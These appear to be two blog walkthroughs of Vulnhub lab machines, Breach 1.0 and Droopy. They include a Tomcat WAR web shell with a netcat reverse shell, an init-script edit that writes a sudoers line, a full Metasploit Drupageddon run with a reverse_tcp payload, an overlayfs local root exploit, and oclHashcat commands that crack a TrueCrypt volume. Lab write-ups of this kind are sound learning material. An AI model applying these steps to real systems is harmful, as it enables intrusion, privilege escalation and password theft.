Vulnhub – Breach 1.0 walkthrough

First let’s see what we got. I did a basic nmap scan:

nmap

It seems that an active IPS/IDS is present. I tried different nmap evasion techniques but those didn’t work, it said that all ports are filtered. I checked manually if port 80 is open or not than  I fired up Nikto, nothing interesting.

Capture

Let’s watch those images. Voila, a little hint:

hint1.PNG

Okay, check that source code. Found an interesting line:

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

It looks like a hash or encoded string. I don’t know why, my first thought was that it is a base64 encoded string. I had to decode the string twice, and that gave me a username:password pair.

source_base64

Did some investigation and found a CMS portal called IMPRESSCMS (clicked on Employee portal on initech.html). Let’s see if we can log in with our username/password pair. Login successful, nice. We have 3 messages in Inbox. Lets see the first:

keyfile

I downloaded the keyfile located at the root of the website, and found out that this is a java keystore file. Read the 2 other messages but those didn’t help me too much. My first thought was proved itself, an active IDS/IPS is present. I searched for exploits related to impresscms but the one that could work were being trolled:

troll.gif

At this point I got stucked a bit. Tried dirbuster, different exploits, XSS vulnerabilities on CMS site but nothing. Tried to brute force the admin account, but no luck. Investigated the other pictures and sites deeper, nothing interesting. One option left on CMS site, check pgibbons profile. I found something interesting:

Published by Peter Gibbons on 2016/6/4 21:37:05. (0 reads)
Team – I have uploaded a pcap file of our red team’s re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to ‘tomcat’. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I’m going fishing for the next 2 days and will not have access to email or phone.

Opened the pcap file, it contained data but I didn’t have a private rsa key to decrypt. WAIT! I have one! I had to export the RSA private key from .keyfile and then I was able to look what the heck happened:

pcapcreds

Tomcat Manager running at port 8443 (https://192.168.110.140:8443/_M@nag3Me/html/ | login successful with wireshark credentials). What more the wireshark capture gave us a hint that we can run shell commands with the help of cmd.jsp. But where it is? It has been uploaded but the resource cannot be found,  the author or a system service may deleted it. A little  googling helped me at this part. I can upload any kind of war files and there is a cmd.war file on the internet (Laudanum) that seems to be the same. So I uploaded it, searched for netcat and made a reverse shell back to my kali box.

cmd_warcommands_with_jsp

netcat

First I tried to exploit some Ubuntu 14.04 based kernel exploits but all of them failed. Finally gave up probing exploits, instead I sent LinEnum priv checker to the victim machine and did a quick investigation what permissions do I have.

MySQL login was successful without password with username root. Nice. I found Milton’s username and password hash in the database then tried to crack the password with oclHashcat. It was successfully recovered, I tried to change my user from tomcat to milton. It was successful. Another username and password was found but I can’t crack this hash within a reasonable time.

mysql.PNG

After that changing user from tomcat to milton find a “some_script.sh” file with following content: Nothing here.

Okay dig deeper. Really. Nothing in here…. After some time I found an init script in init.d folder(portly.sh). This little script redirect all traffic to portly scanner. Okay I will use this script to add milton into sudoers group at system startup.

echo “echo “milton ALL=(ALL) ALL” > /etc/sudoers” > /etc/init.d/portly.sh

After system reboot I rebuild my connections, did a quick sudo su with milton and voila, I captured the flag.

breach.PNG

Advertisements

Vulnhub – Droopy: v0.2

Introducion

This is a quick post about how to hack this vulnerable virtual machine found in Vulnhub website. Just to be clear I am not a security professional, I am just learning and preparing myself to OCSP exam. If you found any mistake please let me know.

Walkthrough

First we do some network discovery with netdiscover:

netdisc

We see that host is at 192.168.1.159. Let’s do nmap scan:

nmap -sS -A -O -vv 192.168.1.159 -Pn > nmap.txt

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0

NMAP shows in this machine there is a website hosted by Apache webserver and Drupal is running on it. I’ve investigated the site and it requires login and password. Fire up Metasploit Framework and let’s do a quick check, find an exploit suitable to our victim. Because Drupal uses MySQL database its quite trivial that a SQL injection could work.

drupal_search

I choosed the third one and fingers crossed. Boom, we have a meterpreter connection.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options

Module options (exploit/multi/http/drupal_drupageddon):

Name Current Setting Required Description
—- ————— ——– ———–
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOST 192.168.1.159 yes The target address
RPORT 80 yes The target port
TARGETURI / yes The target URI of the Drupal installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.1.200 yes The listen address
LPORT 4444 yes The listen port
Exploit target:

Id Name
— —-
0 Drupal 7.0 – 7.31
msf exploit(drupal_drupageddon) > exploit

[*] Started reverse TCP handler on 192.168.1.200:4444
[*] 192.168.1.159:80 – Testing page
[*] 192.168.1.159:80 – Creating new user SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Logging in as SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Trying to parse enabled modules
[*] 192.168.1.159:80 – Enabling the PHP filter module
[*] 192.168.1.159:80 – Setting permissions for PHP filter module
[*] 192.168.1.159:80 – Getting tokens from create new article page
[*] 192.168.1.159:80 – Calling preview page. Exploit should trigger…
[*] Sending stage (33068 bytes) to 192.168.1.159
[*] Meterpreter session 9 opened (192.168.1.200:4444 -> 192.168.1.159:35380) at 2016-04-19 11:06:36 +0200

meterpreter >

Nice news, let’s lurk around and get informations out of the system. I used sysinfo command and let’s see what is it.

meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >

So this is an Ubuntu machine with an old kernel. I am trying my luck and check  if this machine is vulnerable to overlayfs vulnerability or not, what user persmissions I have, am I able to compile my exploit with gcc and run it.

First transfer the exploit to /tmp folder with meterpreter’s upload command and try to execute it:

meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
cd /tmp
gcc 37292.c -o exploit
chmod +x exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can’t access tty; job control turned off
# whoami
root
#

Nice, we have root access to the system, let’s find the flag. Usually flag takes place in the root directory, so let’s see what we have.

dave.tc

Dave.tc? Wut? After googling a bit I found that .tc extension could be a TrueCrypt password protected file. Google says that TrueCrypt are discontinued and password protected volumes can be hacked with proper program and with a good dictionary. My first thought was OclHashcat because I have an AMD card, and truecracker in Kali Linux supports Nvidia card (only?). I didn’t do research if it supports AMD too, because I am happy with OclHashcat. When I downloaded this vulnerable machine I saw two hints:

1.) Grab a copy of the rockyou wordlist.

2.) It’s fun to read other people’s email.

Okay, I have rockyou wordlist so check /var/mail:

mail

Okay, let’s rock:

oclHashcat64.exe -a 0 -m 6211 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

Exhausted. Nothing. At this point several hours later still nothing. I tried to apply rules (best64), different dictionaries, nothing. The last sentence also could give a hint, I did a dictionary combinaton attack ( downloaded lyrics from The Jam, did a dictionary from this and combinated with rockyou). Still no luck. Will I fail at this point? This was so easy until this point. TRY HARDER! So I did a break and when I sit front of my computer again I had clue. What if I am trying with wrong hashing algorithm? Some guys on hashcat forums mentioned that should try SHA512 algorithm instead of RipeMD160. Okay, fire up OclHashcat again.

oclHashcat64.exe -a 0 -m 6221 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

After a couple of minutes it finished. Cracked. Okay, lets install TrueCrypt and check what we got. When it prompt for password I tried Copy/Paste and….. Wrong password. OMG what happening? Again CTRL+C CTRL+V, still no luck. Could it be possible? What if I type the password instead of copy/paste? Yes, it was my fault. It shows the drive, mounted to drive H:

drive

Check out this drive. Nothing interesting, some jpg files and a .secret folder. HMMM!

I opened this one and under the .top folder I captured the flag.

flag

This was quite fun! Thank you!